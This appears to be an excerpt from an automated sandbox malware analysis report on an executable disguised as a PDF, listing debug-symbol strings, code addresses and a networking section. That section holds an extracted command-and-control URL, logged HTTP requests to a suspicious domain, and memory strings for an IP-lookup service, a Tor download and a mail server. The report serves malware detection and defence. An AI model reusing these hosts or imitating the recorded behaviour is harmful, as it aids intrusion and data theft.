                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb<Cwo source: NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: fwpuclnt.pdbH source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670979775.0000000000EE5000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.810472818.0000000001543000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: winhttp.pdb6 source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: NewApp.PDBI source: NewApp.exe, 0000000F.00000002.806394877.0000000000FD7000.00000004.00000010.sdmp
                      Source: Binary string: wimm32.pdbO5 source: WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829603052.0000000004DE0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdbD source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdbh source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb** source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670942444.0000000000EBA000.00000004.00000020.sdmp
                      Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: iLC:\Windows\Microsoft.VisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670154182.00000000009A7000.00000004.00000010.sdmp, NewApp.exe, 0000000F.00000002.806394877.0000000000FD7000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.806993531.0000000000537000.00000004.00000010.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: edputil.pdb: source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdb;^ source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000001F.00000003.804994756.0000000000A15000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000A.00000003.685883855.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829603052.0000000004DE0000.00000004.00000040.sdmp
                      Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdbg source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: rasman.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdbs source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: winnsi.pdb source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: version.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb1 source: NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmp
                      Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\NewApp\NewApp.PDBL source: NewApp.exe, 0000000F.00000002.806394877.0000000000FD7000.00000004.00000010.sdmp
                      Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000001F.00000003.829429051.0000000004E26000.00000004.00000001.sdmp
                      Source: Binary string: msasn1.pdbb source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: ore.pdb source: WerFault.exe, 0000001F.00000003.829429051.0000000004E26000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000A.00000003.685883855.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829603052.0000000004DE0000.00000004.00000040.sdmp
                      Source: Binary string: psapi.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdbW% source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670979775.0000000000EE5000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdby source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001F.00000003.806548362.0000000000A27000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdbk source: WerFault.exe, 0000000A.00000003.685738561.0000000005184000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832058326.0000000005764000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb" source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: clrjit.pdb/t)r source: WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: }}NewApp.PDB} source: NewApp.exe, 00000013.00000002.806993531.0000000000537000.00000004.00000010.sdmp
                      Source: Binary string: edputil.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc.pdb[e<jr source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp

                      Networking:

                      barindex
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorURLs: http://IScLhfPkYRYa5.com
                      Source: global trafficHTTP traffic detected: GET /base/008D1C43D45C0A742A0D32B591796DBD.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/008D1C43D45C0A742A0D32B591796DBD.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/008D1C43D45C0A742A0D32B591796DBD.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 104.21.71.230 104.21.71.230
                      Source: global trafficHTTP traffic detected: GET /base/008D1C43D45C0A742A0D32B591796DBD.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/008D1C43D45C0A742A0D32B591796DBD.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/008D1C43D45C0A742A0D32B591796DBD.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: coroloboxorozor.com
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.913675806.0000000002AC1000.00000004.00000001.sdmp, NewApp.exe, 0000001B.00000002.912580946.0000000003191000.00000004.00000001.sdmp, NewApp.exe, 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: NewApp.exe, 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.913675806.0000000002AC1000.00000004.00000001.sdmp, 0603321WG_0_1 pdf.exe, 00000007.00000002.914638851.0000000002E5C000.00000004.00000001.sdmpString found in binary or memory: http://IScLhfPkYRYa5.com
                      Source: NewApp.exe, 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmpString found in binary or memory: http://ajyrmk.com
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.914541829.0000000002E31000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.671188630.0000000002CD1000.00000004.00000001.sdmp, NewApp.exe, 0000000F.00000002.811943679.0000000003221000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.811688345.00000000024C1000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.671188630.0000000002CD1000.00000004.00000001.sdmp, NewApp.exe, 0000000F.00000002.811943679.0000000003221000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.811688345.00000000024C1000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/008D1C43D45C0A742A0D32B591796DBD.html
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.914541829.0000000002E31000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.914541829.0000000002E31000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.914541829.0000000002E31000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.914541829.0000000002E31000.00000004.00000001.sdmpString found in binary or memory: http://mail.orienttech.com.qa
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.914541829.0000000002E31000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.914541829.0000000002E31000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.671188630.0000000002CD1000.00000004.00000001.sdmp, NewApp.exe, 0000000F.00000002.811943679.0000000003221000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.811688345.00000000024C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
                      Source: WerFault.exe, 0000001F.00000003.824092149.0000000005030000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.913675806.0000000002AC1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%$
                      Source: NewApp.exe, 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.679176630.00000000047A2000.00000004.00000001.sdmp, 0603321WG_0_1 pdf.exe, 00000007.00000002.909029563.0000000000402000.00000040.00000001.sdmp, NewApp.exe, 0000000F.00000002.850762818.00000000050CD000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.879172967.00000000064E4000.00000004.00000001.sdmp, NewApp.exe, 0000001B.00000002.909001517.0000000000402000.00000040.00000001.sdmp, NewApp.exe, 0000001C.00000002.806272942.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.913675806.0000000002AC1000.00000004.00000001.sdmp, NewApp.exe, 0000001B.00000002.912580946.0000000003191000.00000004.00000001.sdmp, NewApp.exe, 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: NewApp.exe, 0000000F.00000002.809472540.0000000001498000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 0_2_05C00720
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 7_2_00E96830
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 7_2_00E95AD0
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 7_2_00E9E248
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 7_2_00E9B0B9
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 7_2_00E9D818
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 7_2_00E9D2AF
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 7_2_00E9D397
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 7_2_00E9D723
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 7_2_029146A0
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 7_2_029145D0
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 7_2_0291D281
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 7_2_05F01CC8
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 7_2_05F00040
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 7_2_05F01448
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 7_2_05F03340
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 7_2_05F03ACC
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 7_2_05F06E7C
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 7_2_05F07268
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exeCode function: 7_2_05F0A728
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 27_2_056846A0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 27_2_056835C4
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 27_2_056845F0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 27_2_056845B0
